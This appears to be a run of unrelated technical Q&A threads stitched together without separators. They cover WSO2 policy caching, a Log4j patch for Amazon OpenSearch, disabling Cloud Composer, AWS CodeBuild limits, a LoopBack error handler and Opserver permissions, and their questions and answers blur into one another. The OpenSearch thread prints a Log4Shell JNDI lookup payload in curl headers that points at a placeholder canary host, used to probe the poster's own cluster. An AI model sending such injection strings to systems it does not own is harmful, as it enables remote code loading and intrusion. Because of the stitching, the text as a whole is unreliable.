After adding a new policy and disabling an outdated policy at the PDP console, an action that displays correctly in the PDP Policy view, the connected PDP, queried through a Java client, did not reflect the logic added by the new policy and kept acting according to the older, disabled rules. We also ran the "Clear Decision Cache" and "Clear Attribute Cache" widgets on the PDP Extension screen, and the PEP still shows the same issue.
A graceful restart of the WSO2 server did resolve the problem. The server is running the WSO2 IS 5.1 release. From an operational standpoint, however, a restart is a rather disruptive action and should be avoided.
Are there further configuration or command options available in the WSO2 IS package to drop the caches and dynamically refresh an active policy without disrupting ongoing services?
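One avenue I have been looking at, in case it is relevant: the cache-clearing widgets on the PDP Extension screen appear to be backed by the Carbon admin SOAP services, so in principle they could be scripted instead of clicked. A rough sketch of how one might explore that; the EntitlementAdminService name and the WSDL-hiding setting are assumptions based on general WSO2 Carbon behaviour, and I have not verified them against 5.1:
# One-time change: set <HideAdminServiceWSDLs>false</HideAdminServiceWSDLs> in
# repository/conf/carbon.xml so the admin-service WSDLs become visible
# (this does require a single restart to pick up).
# Then list the operations exposed by the entitlement admin service:
curl -k -u admin:admin "https://localhost:9443/services/EntitlementAdminService?wsdl"
# Any cache-clearing operations listed there (the ones behind the console widgets)
# could then be invoked from a SOAP client or a scheduled script without restarting the server.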
This is an already tested and working scenario in 5.1.0.
As I understood it, you want to edit a policy and have the changes reflected after you publish the new policy, without doing any other operation, right? Yes, when you publish the same policy again with new changes, it will replace the old policy in the DB and in the cache across the cluster as well. It should be reflected at that point.
Actually, the scenario described by Harsha is not the same as the one Claude asked about. Changing the policy and publishing it might work, but disabling or even deleting a policy from the PDP does not become effective unless the server is restarted.
There is a new ticket in JIRA for this:
Disabling/Deleting Policy from PDP Configuration does not work
Elasticsearch itself should be safe because of its Java Security Manager settings. We're not using logging anyway, so even if those settings were disturbed, we probably wouldn't be sending anything to the logger.
But Amazon has still issued a Log4j patch for our instance -- after several days now. The patch (R20211203-P2) could just be an upgrade to Log4j 2.15, or maybe there is some other logger in the control plane, one we can't see, that it is securing?
We have tried requests containing common exploit strings and we do not see any requests coming to our target.
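Concretely, the kind of probe we used is along these lines; a sketch only, where the domain endpoint and the canary host are placeholders for our own cluster and a DNS/LDAP listener we control, and the lookup string is the widely published Log4Shell test pattern:
# Send the JNDI lookup string in headers that are commonly logged, then watch the
# canary host for DNS/LDAP callbacks. Both hostnames below are placeholders.
curl -sk "https://my-domain.eu-west-1.es.amazonaws.com/_cluster/health" \
  -H 'User-Agent: ${jndi:ldap://canary.example.com/probe}' \
  -H 'X-Api-Version: ${jndi:ldap://canary.example.com/probe}'
# No callback at the canary host suggests the header never reached a vulnerable Log4j,
# though it cannot prove the control plane is unaffected.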
Were we safe before patch R20211203-P2 arrived? Does anyone know what R20211203-P2 actually does? There are no release notes.
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
So yeah I would upgrade ASAP just in case.
I have been trying to find a way to save on the cost of Airflow by disabling it when not in use. I have discovered that if we disable the composer.googleapis.com service while it is not in use, Google does not charge for the service while it is disabled, although it does continue to charge for other resources that are still active. Unfortunately, if the service is disabled for more than an hour or so, it is not usable after re-enabling it. After the service has been disabled for an extended period of time, the Composer Environment Details page shows
An error occurred with retrieving the last operation on this environment
and
This environment cannot be edited due to the errors that occurred during environment creation/update. Please investigate the logs to determine the cause, or create a new environment.
And gcloud composer environments describe shows state: ERROR
The one error that I did see in the logs was a duplicate key error raised when the airflow_monitoring DAG was rescheduled after a little over an hour. I therefore created a new Composer environment, disabled all DAGs, disabled the Composer service, waited a while, then enabled it again. The environment was once again in an error state.
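For reference, the cycle I am describing is just the standard commands below; the environment name and location are placeholders for my own values:
# Disable the Cloud Composer API to stop being billed for the service
gcloud services disable composer.googleapis.com
# ...wait for more than an hour...
# Re-enable it and check the environment state
gcloud services enable composer.googleapis.com
gcloud composer environments describe my-environment \
  --location us-central1 --format="value(state)"
# After an extended disablement this reports ERROR rather than RUNNING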
The Cloud Composer documentation states:
If you disable the Cloud Composer API, environments become unusable within an hour of service deactivation unless you re-enable the API. If you re-enable the API, you are billed for the service usage that occurs while the Cloud Composer service is deactivating.
Maybe this is poorly worded, but to me it sounds like the environment becomes unusable within an hour if you disable the API, but if you re-enable it any time later, it will become usable again. I am wondering whether it really means that if you disable it, you must re-enable it within one hour or it will become permanently unusable.
Is there a way to disable the composer.googleapis.com service for longer than an hour and then get it working again after the service has been re-enabled? Is there something I can restart, or some way to clear the error state? Is there more I should do before disabling it?
I am using composer-1.10.4-airflow-1.10.6 with Python 3.
Thanks.
No, there is no way to disable the composer.googleapis.com service for more than an hour and then have environments be functional after re-enablement.
GCP services are not meant to be enabled/disabled on the fly in this manner, and disablement of a service is meant to be performed with the intention of disabling it for the long term. Keeping a service disabled for long enough means Google-managed components created for the service (specifically for your project) will be decommissioned, and in Composer's case, this will render your environments permanently unusable.
The error state in the environment cannot be cleared. If you want to save on costs, you should delete Composer environments as opposed to deactivating the service entirely. The "service" is not cluster-like and isn't meant to be toggled on and off.
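Put differently, the supported pattern for saving costs is to tear the environment down and recreate it later, rather than toggling the API; a sketch with placeholder names, a placeholder location, and the versions from the question (note that recreation takes a while and you must re-upload DAGs and reconfigure the environment):
# Delete the environment while it is not needed
gcloud composer environments delete my-environment --location us-central1
# Recreate it when it is needed again
gcloud composer environments create my-environment \
  --location us-central1 \
  --image-version composer-1.10.4-airflow-1.10.6 \
  --python-version 3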
I'm a newbie with AWS. With my free tier account I'm trying to build my Node.js project with AWS CodeBuild, but I get this error:
Build failed to start The build failed to start. The following error occured: Cannot have more than 0 builds in queue for the account
I followed the simple AWS tutorial, leaving all the default settings and letting AWS create every service, image, etc. for me.
I also stored the source code in an AWS CodeCommit repository.
Could anybody help me?
In my case, there was a security vulnerability in my account, and AWS automatically raised a support ticket and suspended all resources that were linked to it. I had to fix it, and then, via chat with AWS Support, they resumed my service.
I've seen a lot of answers around the web suggesting to call support, which is a great idea, but I was actually able to get around this on my own.
As the root user, I went in and put in a current credit card; the one that was there had expired. I then deleted my CodeBuild project and created a new one. Now my builds work! It makes sense that AWS just needed a valid payment method before it allowed me to use premium services.
My solution may not work for you, but I sure hope it does!
My error was Project-level concurrent build limit cannot exceed the account-level concurrent build limit of 1 when I tried to increase the concurrent build limit under the checkbox Restrict number of concurrent builds this project can start in the CodeBuild project configuration. I resolved it by writing to support and asking them to increase the limit. They increased it to 20, and it now works as expected. They raised it even though I'm on the Basic support plan on AWS, if anyone's wondering.
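For what it's worth, once support has raised the account-level quota, the project-level value can also be set from the CLI rather than the console; a sketch, assuming a project named my-project and a CLI version recent enough to support the option:
# Set the per-project concurrent build limit (it must not exceed the account-level limit)
aws codebuild update-project --name my-project --concurrent-build-limit 1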
My solution was to add a new service role name and set the concurrent build limit to 1. This worked.
I think your issue is resolved by now. Anyway, I faced the same issue. In my case I had a CodeBuild project connecting to a GitHub repository, and I had hard-coded an AWS access key and secret in the buildspec.yml file. AWS identified this as an unauthorized login, so they added security restrictions to the resources and opened a support issue. In such a case, look for the emails from AWS in which they explain the reason for this behavior and the steps to get it corrected.
I created an API Connect project with the command
apic loopback
When I try to launch the API Designer, I receive the error below:
sdil#sdil-VirtualBox:~/Project/test-apic/todo4$ apic edit
The user model "User" is attached to an application that does not specify
whether other sessions should be invalidated when a password or
an email has changed. Session invalidation is important for security
reasons as it allows users to recover from various account breach
situations.
We recommend turning this feature on by setting
"logoutSessionsOnSensitiveChanges" to true in
server/config.json (unless you have implemented your own solution
for token invalidation).
We also recommend enabling "injectOptionsFromRemoteContext" in
User's settings (typically via common/models/*.json file).
This setting is required for the invalidation algorithm to keep
the current session valid.
Learn more in our documentation at
https://loopback.io/doc/en/lb2/AccessToken-invalidation.html
Error: loopback.errorHandler is no longer available. Please use the module "strong-error-handler" instead.
When I check the declarations in package.json, I do see strong-error-handler listed:
"dependencies": {
...
"strong-error-handler": "^2.0.0",
}
How do I fix this to get API Designer running?
I sort of recognize this problem, actually. We had the new strong-error-handler but also the old one active.
Do the steps in "Migration from old LoopBack error handler" here:
https://loopback.io/doc/en/lb3/Using-strong-error-handler.html#migration-from-old-loopback-error-handler
That should eliminate the old one completely.
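Concretely, the migration comes down to replacing the old error-handler entry in the "final:after" phase of server/middleware.json with strong-error-handler; the snippet below is my recollection of the documented default, not your exact file:
"final:after": {
  "strong-error-handler": {
    "params": {
      "debug": false,
      "log": true
    }
  }
}
So remove the old "loopback#errorHandler" entry there (and any leftover "errorHandler" block in server/config.json). The separate warning about session invalidation in your output is unrelated to this error; as the message itself says, it goes away once "logoutSessionsOnSensitiveChanges" is set to true in server/config.json.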
I've deployed a copy of Opserver, and it is working perfectly when using alladmin as the security setting. However, once I switch it to ad and configure the groups, the SQL tab goes away, and I get an access denied message if I try browsing directly to it. The dashboard still displays all SolarWinds data as expected.
The build I'm using is actually from November. I tried a more recent build, but I lose the network information from SolarWinds (the CPU and Mem graphs show, but Net is all blank).
Is there a separate place to configure the SQL permissions that I'm missing?
I think perhaps there was some caching going on for the hub that wasn't happening for the provider, because they are both working now. Since it was a new security group, perhaps it hadn't replicated yet (causing the SQL auth to fail) but the dashboard provider was still using the previous authentication?
I also did discover a neat option while researching this, though: the GitHub page mentions that you can also specify security at the provider level in the JSON, using the AdminGroups and ViewGroups properties!
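For anyone who lands here later, the provider-level option looks roughly like this; a sketch based on that GitHub note, where the exact settings file, property casing, and group names are assumptions about my setup rather than something I have verified against the current build:
{
  "AdminGroups": "MYDOMAIN\\Opserver-SQL-Admins",
  "ViewGroups": "MYDOMAIN\\Opserver-SQL-Viewers",
  ...
}
In other words, the same AdminGroups/ViewGroups properties can be dropped into the SQL provider's JSON settings so that tab gets its own access groups, separate from the global security setting.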